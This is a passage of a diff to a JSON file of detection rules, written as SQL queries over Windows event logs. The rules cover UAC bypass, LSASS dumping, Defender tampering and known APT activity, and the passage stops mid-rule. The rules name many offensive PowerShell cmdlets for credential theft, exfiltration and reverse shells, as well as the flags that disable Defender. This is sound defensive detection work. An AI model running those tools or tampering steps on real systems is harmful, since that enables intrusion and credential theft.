"80fc36aa-945e-4181-89f2-2f907ab6775d", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ - "attack.defense_evasion", "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "author": "frack113", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "author": "frack113", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": "Sreeman", "tags": [ + "attack.defense_evasion", + "attack.persistence", "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "test", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", "attack.execution", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM 